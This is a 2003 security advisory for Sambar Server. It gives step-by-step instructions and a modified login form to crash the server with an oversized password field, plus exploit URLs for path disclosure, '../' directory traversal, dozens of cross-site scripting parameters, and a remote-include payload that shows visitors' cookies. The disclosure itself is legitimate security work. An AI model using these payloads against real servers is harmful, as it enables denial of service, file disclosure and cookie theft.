6th Apr 2003 [SBWID-6108]
COMMAND
	Sambar Server buffer overflow and sample cgi / script vulnerabilities
SYSTEMS AFFECTED
	 All Sambar Server systems with sysuser login included (buffer overflow)
	 Sambar 5.3 and prior (script vulns)
PROBLEM
	 1 Buffer overflow
	 = 
	Lorenzo   Manuel   Hernandez   Garcia-Hierro   [[email protected]]
	[http://www.lorenzohgh.com] found :
	This vulnerability is caused because the form  that  the  Sambar  Server
	demon doesn't  examinates  the  buffer  and  sizes  of  the  login  form
	transfer, the only protection for the server is the values at  the  form
	in the html code ( the max value of the RCPassword input) , this can  be
	a vulnerability if the server is public-exposed and the  directories  of
	the sysuser is known.
	 METHOD TO XPLOIT IT:
	You must be sure and known the true path (at sambar root like  c:\sambar
	) of the sysuser login form, now follow this easy steps:
	1st:  go  to  the   webserver   sysuser   login   form   path   ,   like
	http://localhost/sysuser/index.stm (you must specify the  index.stm  for
	the RPC called locally trough index.stm ).
	2nd: copy and paste the code of the form ( total page ) and paste it  in
	a blank text field , rename to a something.html .
	3th: put in the correct fields the  http://localhost  or  url  for  your
	sambar server installation ,this  is  for  the  form  and  images  ,  of
	course, the form must be connect to  the  correct  url  address  of  the
	server script. The code goes like here:
	
	[FORM METHOD=POST ACTION="http://localhost/session/login" onsubmit="return FormValidator(this)"]
	[INPUT TYPE=hidden NAME="RCpage"
	VALUE="http://localhost/sysuser/desktop.stm"]*This is your desktop installation.
	[INPUT TYPE=hidden NAME="onfailure" 
	VALUE="http://localhost/sysuser/relogin.stm"]*you can modify this to more buffer over flow like to a cgi script (this can be a DoS attack
	[INPUT TYPE=hidden NAME="start" VALUE=1>
	[INPUT TYPE=hidden NAME="RCSdesktop" VALUE="true"]
	[INPUT TYPE=hidden NAME="RCSsort" VALUE="desc"]
	[INPUT TYPE=hidden NAME="RCSstyle" VALUE="txtconvert"]
	[INPUT TYPE=hidden NAME="RCSwrap" VALUE="60"]
	[INPUT TYPE=hidden NAME="RCScount" VALUE="25]
	[INPUT TYPE=hidden NAME="RCSfolder" VALUE="inbox"]
	[INPUT TYPE=hidden NAME="RCSpath" VALUE="/]
	[INPUT TYPE=hidden NAME="RCShome" VALUE="/config/] *This is the problem!*
	[INPUT TYPE=hidden NAME="RCSbrowse" VALUE="/config/"]*This is the problem!*
	[INPUT TYPE=hidden NAME="RCSsortby" VALUE="name]
	
	4th: now you can try to refresh  and  login  ,  use  a  valid  user  and
	password if you want to prove the vulnerability number one or go to  the
	6th step!
	5th: now you must push on the submit button , wait  ,  and  if  you  are
	running the server on your computer  the  server  pick  up  and  becomes
	unstable , if you continue sending  this  attemps  the  server  must  be
	restarted or the computer restarted during the attack!.
	6th: the second vulnerability is the bffer overflow in  form  fields  of
	password ( you can learn more about this  in  the  advisory  of  Allaire
	'ColdFusion Buffer OverFlow in form fields') , you can insert more  than
	million of characters and submit it but you must edit the form  code  in
	your computer:
	
	[INPUT TYPE=PASSWORD NAME="RCpwd" VALUE="" MAXLENGTH=40]< change this  to...
	[INPUT TYPE=PASSWORD NAME="RCpwd" VALUE="here put your text, more than hundred thousand  characters"] 
	
	and.......... 7th: push on submit and the server pick up too!
	 2 Scripts
	 =
	Gr�gory  Le  Bras  aka  GaLiaRePt  [http://www.Security-Corporation.com]
	says :
	
	 http://www.security-corp.org/index.php?ink=4-15-1
	 http://www.security-corporation.com/index.php?id=advisories&a=012-FR
	
	 � Path Disclosure :
	 ===================
	Sambar default's installation  of  the  CGI  bin  directory  contains  a
	testcgi.exe  and  a  environ.pl  that  allows  remote  users   to   view
	information regarding the operating system and web server's directory.
	These vulnerabilities can be triggered by a  remote  user  submitting  a
	specially crafted HTTP request.
	- Exploits :
	
	http://[target]/cgi-bin/environ.pl
	http://[target]/cgi-bin/testcgi.exe
	
	Will produce the following output:
	
	- environ.pl : 
	--------------
	Sambar Server CGI Environment Variables 
	GATEWAY_INTERFACE: CGI/1.1 
	PATH_INFO: 
	PATH_TRANSLATED: C:/sambar53/cgi-bin/environ.pl 
	QUERY_STRING: 
	REMOTE_ADDR: 127.0.0.1 
	REMOTE_HOST: 
	REMOTE_USER: 
	REQUEST_METHOD: GET 
	DOCUMENT_NAME: environ.pl 
	DOCUMENT_URI: /cgi-bin/environ.pl 
	SCRIPT_NAME: /cgi-bin/environ.pl 
	SCRIPT_FILENAME: C:/sambar53/cgi-bin/environ.pl 
	SERVER_NAME: localhost 
	SERVER_PORT: 80 
	SERVER_PROTOCOL: HTTP/1.1 
	SERVER_SOFTWARE: SAMBAR 
	CONTENT_LENGTH: 0 
	CONTENT: 
	- testcgi.exe :
	---------------
	Test CGI ... Version 1.00 [ build date 8-03-97 ]
	QUERY_STRING 
	PATH_INFO 
	PATH_TRANSLATED C:/sambar53/cgi-bin/testcgi.exe 
	SCRIPT_NAME /cgi-bin/testcgi.exe 
	SCRIPT_FILENAME C:/sambar53/cgi-bin/testcgi.exe 
	DOCUMENT_ROOT C:/sambar53/docs/ 
	HTTP_USER_AGENT Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) 
	REMOTE_ADDR 127.0.0.1 
	REMOTE_HOST 
	SERVER_NAME localhost 
	SERVER_PROTOCOL HTTP/1.1 
	SERVER_SOFTWARE SAMBAR 
	CONTENT_TYPE 
	
	 � Directory Disclosure :
	 ========================
	Other security vulnerabilities  was  found  in  Sambar  which  allow  an
	attacker to reveal the content of the files and the directories  on  the
	web server, even if it should not be revealed.
	These vulnerabilities can be simply exploited by requesting a  specially
	crafted URL utilizing iecreate.stm and  ieedit.stm  application  with  a
	'../' appended.
	- Exploits :
	
	http://[target]/sysuser/docmgr/iecreate.stm?template=../
	http://[target]/sysuser/docmgr/ieedit.stm?url=../
	
	 � Cross Site Scripting :
	 ========================
	Many exploitable bugs was found on  Sambar  Server  which  cause  script
	execution on client's computer by following a crafted url.
	This kind of attack known as  "Cross-Site  Scripting  Vulnerability"  is
	present in  many  section  of  the  web  site,  an  attacker  can  input
	specially crafted links and/or other malicious scripts.
	- Exploits :
	
	http://[target]/netutils/ipdata.stm?ipaddr=[hostile_code]
	http://[target]/netutils/whodata.stm?sitename=[hostile_code]
	http://[target]/netutils/findata.stm?user=[hostile_code]
	http://[target]/netutils/findata.stm?host=[hostile_code]
	http://[target]/isapi/testisa.dll?check1=[hostile_code]
	http://[target]/cgi-bin/environ.pl?param1=[hostile_code]
	http://[target]/samples/search.dll?query=[hostile_code]&logic=AND
	http://[target]/wwwping/index.stm?wwwsite=[hostile_code]
	http://[target]/syshelp/stmex.stm?foo=[hostile_code]&bar=456
	http://[target]/syshelp/stmex.stm?foo=123&bar=[hostile_code]
	http://[target]/syshelp/cscript/showfunc.stm?func=[hostile_code]
	http://[target]/syshelp/cscript/showfncs.stm?pkg=[hostile_code]
	http://[target]/syshelp/cscript/showfnc.stm?pkg=[hostile_code]
	http://[target]/sysuser/docmgr/ieedit.stm?path=[hostile_code]
	http://[target]/sysuser/docmgr/ieedit.stm?name=[hostile_code]
	http://[target]/sysuser/docmgr/edit.stm?path=[hostile_code]
	http://[target]/sysuser/docmgr/edit.stm?name=[hostile_code]
	http://[target]/sysuser/docmgr/iecreate.stm?path=[hostile_code]
	http://[target]/sysuser/docmgr/create.stm?path=[hostile_code]
	http://[target]/sysuser/docmgr/info.stm?path=[hostile_code]
	http://[target]/sysuser/docmgr/info.stm?name=[hostile_code]
	http://[target]/sysuser/docmgr/ftp.stm?path=[hostile_code]
	http://[target]/sysuser/docmgr/htaccess.stm?path=[hostile_code]
	http://[target]/sysuser/docmgr/mkdir.stm?path=[hostile_code]
	http://[target]/sysuser/docmgr/rename.stm?path=[hostile_code]
	http://[target]/sysuser/docmgr/rename.stm?name=[hostile_code]
	http://[target]/sysuser/docmgr/search.stm?path=[hostile_code]
	http://[target]/sysuser/docmgr/search.stm?query=[hostile_code]
	http://[target]/sysuser/docmgr/sendmail.stm?path=[hostile_code]
	http://[target]/sysuser/docmgr/sendmail.stm?name=[hostile_code]
	http://[target]/sysuser/docmgr/template.stm?path=[hostile_code]
	http://[target]/sysuser/docmgr/update.stm?path=[hostile_code]
	http://[target]/sysuser/docmgr/update.stm?name=[hostile_code]
	http://[target]/sysuser/docmgr/vccheckin.stm?path=[hostile_code]
	http://[target]/sysuser/docmgr/vccheckin.stm?name=[hostile_code]
	http://[target]/sysuser/docmgr/vccreate.stm?path=[hostile_code]
	http://[target]/sysuser/docmgr/vccreate.stm?name=[hostile_code]
	http://[target]/sysuser/docmgr/vchist.stm?path=[hostile_code]
	http://[target]/sysuser/docmgr/vchist.stm?name=[hostile_code]
	http://[target]/cgi-bin/testcgi.exe?[hostile_code]
	
	- An other Cross Site Scripting can be  exploited  with  a  remote  file
	where's include the hostile code like this :
	
	http://[target]/sysuser/docmgr/ieedit.stm?url=http://[attacker]/hostile_file.htm
	
	The hostile code could be :
	
	[script]alert("Cookie="+document.cookie)[/script]
	
	(open a window with the cookie of the visitor.)
	(replace [] by <>)
SOLUTION
	None yet